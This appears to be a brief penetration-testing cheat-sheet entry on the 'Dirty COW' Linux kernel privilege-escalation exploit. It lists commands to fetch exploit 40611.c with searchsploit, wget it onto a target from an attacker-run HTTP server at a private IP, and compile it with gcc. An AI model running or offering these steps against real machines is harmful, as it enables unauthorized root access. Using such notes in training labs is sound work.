Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)

Unstable, might need to compile from host if gcc is not present on target

sudo searchsploit -m linux/local/40611.c #wget the exploit to target wget http://192.168.119.177:8000/40611.c #Change permissions chmod +x 40611.c #Compile compile on kali before exfil to target gcc -pthread 40611.c -o exploit -lcrypt

Last updated